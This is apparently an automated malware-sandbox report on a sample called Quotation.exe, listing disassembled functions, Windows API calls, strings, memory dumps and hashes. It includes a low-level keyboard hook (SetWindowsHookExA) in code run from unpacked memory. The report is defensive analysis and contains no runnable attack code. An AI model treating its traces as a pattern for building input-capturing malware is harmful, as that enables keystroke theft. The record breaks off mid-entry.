Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: bf0799ea3bd6f053e04a74c3ecacf9df28762d59f89d86d460fcd2570ffda868
Instruction ID: 26ea8d1a65f0c358df8059d13c2b59527feb86654ff2728a298fdc5f00fd0ae6
Opcode Fuzzy Hash: bf0799ea3bd6f053e04a74c3ecacf9df28762d59f89d86d460fcd2570ffda868
Instruction Fuzzy Hash: E221D675500B049FDB649F28DA4895BB7F4EF45711B108A3EE896A26A0DB38E814DF28

Function 73C62049 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 73C621BF

Part of subcall function 73C612E1: lstrcpynW.KERNEL32(00000000,?,73C6156A,?,73C611C4,-000000A0), ref: 73C612F1

GlobalAlloc.KERNEL32(?), ref: 73C6212C
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 73C6214C

Strings

@H3w, xrefs: 73C6216A

Memory Dump Source

Source File: 00000000.00000002.1700170196.0000000073C61000.00000020.00000001.01000000.00000006.sdmp, Offset: 73C60000, based on PE: true

Associated: 00000000.00000002.1700136745.0000000073C60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1700188621.0000000073C64000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1700247569.0000000073C66000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73c60000_Quotation.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID: @H3w
API String ID: 4216380887-4275297014
Opcode ID: faca138b6dd632195904936c48133eb10d597ddf5baf8df0bbb0981af91ecd0a
Instruction ID: 3db57ad844a413e8ca02d817bcb2cd5faa7345cf70fa2795cb451b9d27d25bfd
Opcode Fuzzy Hash: faca138b6dd632195904936c48133eb10d597ddf5baf8df0bbb0981af91ecd0a
Instruction Fuzzy Hash: 32413771409B59EFC301DF26C8C4BE977B8FB05341B55023EEA4DDE189D7719980CAA2

Function 0040362D Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040364B
MulDiv.KERNEL32(00120C50,?,00120C50), ref: 00403673
wsprintfW.USER32 ref: 00403683
SetWindowTextW.USER32(?,?), ref: 00403693
SetDlgItemTextW.USER32(?,00000406,?), ref: 004036A5

Strings

verifying installer: %d%%, xrefs: 0040367D

Memory Dump Source

Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 047d2cc0e248829387beeb5a8e07bbe74402e6ee51346e78a70c3337b09d8a04
Instruction ID: 44471e5cb11ab05bb0c6ce4c76b363bdac3f6882ce80e8a3b6daee8e8afc751d
Opcode Fuzzy Hash: 047d2cc0e248829387beeb5a8e07bbe74402e6ee51346e78a70c3337b09d8a04
Instruction Fuzzy Hash: BE018F71540208BBDF20AF60DE45BAA3B28A700305F00803AF642B51E0DBB58554CF4C

Function 73C62209 Relevance: 9.1, APIs: 6, Instructions: 101COMMON

Download Yara Rule

APIs

Part of subcall function 73C612F8: GlobalAlloc.KERNEL32(?,?,73C611C4,-000000A0), ref: 73C61302

GlobalFree.KERNEL32(00000000), ref: 73C622F1
GlobalFree.KERNEL32(00000000), ref: 73C62326

Memory Dump Source

Source File: 00000000.00000002.1700170196.0000000073C61000.00000020.00000001.01000000.00000006.sdmp, Offset: 73C60000, based on PE: true

Associated: 00000000.00000002.1700136745.0000000073C60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1700188621.0000000073C64000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1700247569.0000000073C66000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73c60000_Quotation.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 4edc33303f1f3640d949a55391712f3f8565c71906052763ffb944acc1617660
Instruction ID: 4e27d6da988a955be6c087fa46d74215b53ce04f02f9a6f50ee8a283d2a44c7f
Opcode Fuzzy Hash: 4edc33303f1f3640d949a55391712f3f8565c71906052763ffb944acc1617660
Instruction Fuzzy Hash: 80312432204699EFE7169F57C8D8F2AB7B9FF85321B214528F507CE090C731A850DB62

Function 73C610C7 Relevance: 8.9, APIs: 7, Instructions: 162memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(?,?), ref: 73C6116B
GlobalFree.KERNEL32(00000000), ref: 73C611AE
GlobalFree.KERNEL32(00000000), ref: 73C611CD
GlobalAlloc.KERNEL32(?,?), ref: 73C611E6
GlobalFree.KERNEL32 ref: 73C6125C
GlobalFree.KERNEL32(?), ref: 73C612A7
GlobalFree.KERNEL32(00000000), ref: 73C612BF

Memory Dump Source

Source File: 00000000.00000002.1700170196.0000000073C61000.00000020.00000001.01000000.00000006.sdmp, Offset: 73C60000, based on PE: true

Associated: 00000000.00000002.1700136745.0000000073C60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1700188621.0000000073C64000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1700247569.0000000073C66000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73c60000_Quotation.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: c5b9394fa874b483d534e075e1a2dcc7b818d613bddd37c09d6e151c6a8e0750
Instruction ID: a75dcd74b72a43cf498022d47dd6570ce0a157c764960e3f384ca6f963006014
Opcode Fuzzy Hash: c5b9394fa874b483d534e075e1a2dcc7b818d613bddd37c09d6e151c6a8e0750
Instruction Fuzzy Hash: 68518DB6504701DFD710EFAAC8C0B2A77F8FF48616B214529EA8ADF290D635E900CB91

Function 73C61F7B Relevance: 7.5, APIs: 5, Instructions: 38memorylibraryloaderCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000808,00000000,73C62B4C,00000000,00000808), ref: 73C61F8C
GlobalAlloc.KERNEL32(?,00000000), ref: 73C61F97
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 73C61FAB
GetProcAddress.KERNEL32(?,00000000), ref: 73C61FB6
GlobalFree.KERNEL32(00000000), ref: 73C61FBF

Memory Dump Source

Source File: 00000000.00000002.1700170196.0000000073C61000.00000020.00000001.01000000.00000006.sdmp, Offset: 73C60000, based on PE: true

Associated: 00000000.00000002.1700136745.0000000073C60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1700188621.0000000073C64000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1700247569.0000000073C66000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73c60000_Quotation.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: a671310ce38b827072b5bc6220cc464e090aebea4e3f1f317b09f3d6cdb460fa
Instruction ID: ca08e0d7e903c3f848090fae019ed20f34980056e297db305c7060575c9d3cf1
Opcode Fuzzy Hash: a671310ce38b827072b5bc6220cc464e090aebea4e3f1f317b09f3d6cdb460fa
Instruction Fuzzy Hash: E8F0C033108579FBC6116AE7DC0CE57BE6DEB8B6FAB260215F61DD91A0C562AC008771

Function 73C61F1E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28stringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 73C61F51
lstrcpyW.KERNEL32(?,error,00001018,73C61765,00000000,?), ref: 73C61F71

Strings

callback%d, xrefs: 73C61F4B
error, xrefs: 73C61F67, 73C61F6F

Memory Dump Source

Source File: 00000000.00000002.1700170196.0000000073C61000.00000020.00000001.01000000.00000006.sdmp, Offset: 73C60000, based on PE: true

Associated: 00000000.00000002.1700136745.0000000073C60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1700188621.0000000073C64000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1700247569.0000000073C66000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73c60000_Quotation.jbxd

Similarity

API ID: lstrcpywsprintf
String ID: callback%d$error
API String ID: 2408954437-1307476583
Opcode ID: fdeff285c55296647047aad088657446add26b8f88cbdef0f83c0d92b67c6799
Instruction ID: bdf2d6888155c7ff4249dcbdcd097a16e1f23fcfc1c0d7152b7bee570d600b8a
Opcode Fuzzy Hash: fdeff285c55296647047aad088657446add26b8f88cbdef0f83c0d92b67c6799
Instruction Fuzzy Hash: 32F08C35204530EFD305CB05D988FBA73A9EF89315F0A81A8FC4ADF242C770AC408B92

Function 00406534 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00403CA1,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,004039A0), ref: 0040653A
CharPrevW.USER32(?,00000000), ref: 00406545
lstrcatW.KERNEL32(?,004082B0), ref: 00406557

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 00406534

Memory Dump Source

Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user~1\AppData\Local\Temp\
API String ID: 2659869361-2382934351
Opcode ID: d05188d841616a9e1b7d59f18f8490afccaafd82e288364c4b54bb9922993767
Instruction ID: 997ea4b4438496dccce44eacbb2634370b3c3ae0899ac86cf6792f2d8b8f87b4
Opcode Fuzzy Hash: d05188d841616a9e1b7d59f18f8490afccaafd82e288364c4b54bb9922993767
Instruction Fuzzy Hash: F7D05E31102924AFC2026B58AE08D9B77ACEF46341341406EFAC1B3160CB745D5287ED

Function 73C61CC7 Relevance: 6.2, APIs: 4, Instructions: 209COMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 73C61D37
GlobalFree.KERNEL32(?), ref: 73C61DF2
GlobalFree.KERNEL32(00000000), ref: 73C61DF5
__alldvrm.LIBCMT ref: 73C61E2F

Memory Dump Source

Source File: 00000000.00000002.1700170196.0000000073C61000.00000020.00000001.01000000.00000006.sdmp, Offset: 73C60000, based on PE: true

Associated: 00000000.00000002.1700136745.0000000073C60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1700188621.0000000073C64000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1700247569.0000000073C66000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73c60000_Quotation.jbxd

Similarity

API ID: FreeGlobal$__alldvrm
String ID:
API String ID: 482422042-0
Opcode ID: b065b8ef8c7c092957ad0f90cdd6ba98bf98682d900e84da8ac9c41deb886845
Instruction ID: d8476042f3144cd94c4cd6fcd0888a8828219b763df43c3d342349508031ebe8
Opcode Fuzzy Hash: b065b8ef8c7c092957ad0f90cdd6ba98bf98682d900e84da8ac9c41deb886845
Instruction Fuzzy Hash: D651F572604345CFD3079E7689C477EB6FEABC8213B1A492DE147CB286E7B1C9808252

Function 00403367 Relevance: 6.0, APIs: 4, Instructions: 28COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00403378
GetTickCount.KERNEL32 ref: 00403397
CreateDialogParamW.USER32(0000006F,00000000,0040362D,00000000), ref: 004033B6
ShowWindow.USER32(00000000,00000005), ref: 004033C4

Memory Dump Source

Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 357b023d8aff776a3d5515b2d6cdf3b091415c345a00606534bd97e45556d1c1
Instruction ID: 5fb2c38a213eff1d2f515c73fe307429b33afba48c29838db2cc379488067e45
Opcode Fuzzy Hash: 357b023d8aff776a3d5515b2d6cdf3b091415c345a00606534bd97e45556d1c1
Instruction Fuzzy Hash: C9F0F870551700EBDB209F60EF8EB163AA8B740B02F505579F941B51F0DB788514CA5C

Function 00405842 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00405852

Part of subcall function 004054C6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054D8

OleUninitialize.OLE32(00000404,00000000), ref: 0040589E

Part of subcall function 00401399: MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
Part of subcall function 00401399: SendMessageW.USER32(?,00000402,00000000), ref: 00401409

Strings

Eget Setup: Installing, xrefs: 00405842

Memory Dump Source

Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: MessageSend$InitializeUninitialize
String ID: Eget Setup: Installing
API String ID: 1011633862-3699597151
Opcode ID: fae861af5de1a05301b375e788940b7af21e1eb504ad4c379f9acf3cdad0321b
Instruction ID: 8d413f420cbd2cda170a8e13f5886ccfc68e5e1a5fc2061566676394b2cd1e54
Opcode Fuzzy Hash: fae861af5de1a05301b375e788940b7af21e1eb504ad4c379f9acf3cdad0321b
Instruction Fuzzy Hash: 97F09077800A008EE3416B54AD01B6777A4EBD1305F09C53EEE88A62A1DB794C628A5E

Function 00406CEE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00403436,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Quotation.exe,C:\Users\user\Desktop\Quotation.exe,80000000,00000003), ref: 00406CF4
CharPrevW.USER32(?,00000000), ref: 00406D05

Strings

C:\Users\user\Desktop, xrefs: 00406CEE

Memory Dump Source

Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3976562730
Opcode ID: 3a3825e1876a518aafdd43096896adb57dd8be29e1d638c1e9cc1f107b5b3402
Instruction ID: 8ca8e9e1e5128dac63b4d4f5950f4db4f9885d0bf84f26727eb387c0c5501f09
Opcode Fuzzy Hash: 3a3825e1876a518aafdd43096896adb57dd8be29e1d638c1e9cc1f107b5b3402
Instruction Fuzzy Hash: 75D05E31015924DBD7626B18ED059AF77A8EF0130030A846EE983E3164CB385C9187BD

Analysis Process: Quotation.exePID: 1516, Parent PID: 2436COMMON

Execution Graph

Execution Coverage:	10.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2.6%
Total number of Nodes:	115
Total number of Limit Nodes:	15

Executed Functions

Function 38103128 Relevance: 8.0, Strings: 6, Instructions: 518
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$q, xrefs: 38103813
$q, xrefs: 3810382B
$q, xrefs: 381037EA
$q, xrefs: 38103807
$q, xrefs: 381037DE
$q, xrefs: 38103837

Memory Dump Source

Source File: 00000009.00000002.2520082278.0000000038100000.00000040.00000800.00020000.00000000.sdmp, Offset: 38100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_38100000_Quotation.jbxd

Similarity

API ID:
String ID: $q$$q$$q$$q$$q$$q
API String ID: 0-2069967915
Opcode ID: b1432d2a7b754745e253c79512b620d75e90b0fa26140887939db68e953be7b0
Instruction ID: 1068d1088543412b5baa3bc0bee14c26a41ea4e72825a9309eede060a2d407ba
Opcode Fuzzy Hash: b1432d2a7b754745e253c79512b620d75e90b0fa26140887939db68e953be7b0
Instruction Fuzzy Hash: 13220D35E10719CBDB15DF79C85069DF7B2BFD9300F61C6AAD409AB224EB30A985CB90

Function 385E8828 Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,385E9658,00000000,00000000), ref: 385E986B

Memory Dump Source

Source File: 00000009.00000002.2520260130.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_385e0000_Quotation.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 5a33f8b39e7f3badca05d171d56a65448c99f080b5d5b6026c9a3012e4a3b2c9
Instruction ID: 6b704c41126ef4a78b26c76b9b51629384fd3b1cfc2e8e3d909412ebb47c96fa
Opcode Fuzzy Hash: 5a33f8b39e7f3badca05d171d56a65448c99f080b5d5b6026c9a3012e4a3b2c9
Instruction Fuzzy Hash: B22115B5D042499FDB14DFAAC844BEEBBF5FB88310F10842AE458A7250CB74A945CFA5

Function 385E5E81 Relevance: 6.1, APIs: 4, Instructions: 132
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 385E5F06
GetCurrentThread.KERNEL32 ref: 385E5F43
GetCurrentProcess.KERNEL32 ref: 385E5F80
GetCurrentThreadId.KERNEL32 ref: 385E5FD9

Memory Dump Source

Source File: 00000009.00000002.2520260130.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_385e0000_Quotation.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: a6f1791d81f443a1f60c568297119a35e54e77f1fcb06757c2dd73999c578533
Instruction ID: 3c5061e012c5f708f3c13a88e29730f905e62eda57897df73107b199d0dc85d6
Opcode Fuzzy Hash: a6f1791d81f443a1f60c568297119a35e54e77f1fcb06757c2dd73999c578533
Instruction Fuzzy Hash: 805155B0D013098FDB14DFAAD945BDEBBF1AF88310F208159E419A7360DB346945CF66

Function 385E5E88 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 385E5F06
GetCurrentThread.KERNEL32 ref: 385E5F43
GetCurrentProcess.KERNEL32 ref: 385E5F80
GetCurrentThreadId.KERNEL32 ref: 385E5FD9

Memory Dump Source

Source File: 00000009.00000002.2520260130.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_385e0000_Quotation.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 3a89485b37012b15b1bd8a0296c99672f3a02c1fc1354b69b888a68b638f5809
Instruction ID: 4f3bf2668ee9e25217312d6f132d3d08fd917af4e61fed303c4830bb0ed7f47f
Opcode Fuzzy Hash: 3a89485b37012b15b1bd8a0296c99672f3a02c1fc1354b69b888a68b638f5809
Instruction Fuzzy Hash: A25134B0D017098FDB14DFAAD945BDEBBF1AB88310F208159E419A7360DB34A945CF66

Function 385E60C8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 385E6157

Strings

U, xrefs: 385E60CD

Memory Dump Source

Source File: 00000009.00000002.2520260130.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_385e0000_Quotation.jbxd

Similarity

API ID: DuplicateHandle
String ID: U
API String ID: 3793708945-3372436214
Opcode ID: 7e76d018a1075907b63f2f95e084f9dde86486b4b70861d87ae8d7e72e513b7d
Instruction ID: f02a8e69588778929b068f46b24861f5fb1182db0361e2677d4a18b4c82af310
Opcode Fuzzy Hash: 7e76d018a1075907b63f2f95e084f9dde86486b4b70861d87ae8d7e72e513b7d
Instruction Fuzzy Hash: 0321D2B5D00248AFDB10CFAAD984ADEFFF4EB48320F14841AE958A7351D374A951CFA1

Function 385E2430 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,0000000C,?,?,?), ref: 385E248A

Strings

0, xrefs: 385E2472

Memory Dump Source

Source File: 00000009.00000002.2520260130.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_385e0000_Quotation.jbxd

Similarity

API ID: CreateWindow
String ID: 0
API String ID: 716092398-4108050209
Opcode ID: 8398329dc3da6e4335157d9cc944790f22ba9f452ba12cf6efed1f2ebe3d3b4b
Instruction ID: 4a98fa10353f546b68b4891b88ff9434f2b6bdbe8bd1f16a565883fdd48ac76f
Opcode Fuzzy Hash: 8398329dc3da6e4335157d9cc944790f22ba9f452ba12cf6efed1f2ebe3d3b4b
Instruction Fuzzy Hash: C421CEB5800208EFEF15DFA4C884BDDBBB5BF08314F218149F918AB264CB75A845CFA0

Function 38108134 Relevance: 2.7, Strings: 2, Instructions: 216
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$q, xrefs: 3810815D
$q, xrefs: 38108169

Memory Dump Source

Source File: 00000009.00000002.2520082278.0000000038100000.00000040.00000800.00020000.00000000.sdmp, Offset: 38100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_38100000_Quotation.jbxd

Similarity

API ID:
String ID: $q$$q
API String ID: 0-3126353813
Opcode ID: 31f8d070d5a2eda437e37a09855a3e54971bfe13de579aaf014095e9fb4984a5
Instruction ID: af59e4db496a069a3434292009727728a4b471ca9a570dd113d6aa9f056bdd65
Opcode Fuzzy Hash: 31f8d070d5a2eda437e37a09855a3e54971bfe13de579aaf014095e9fb4984a5
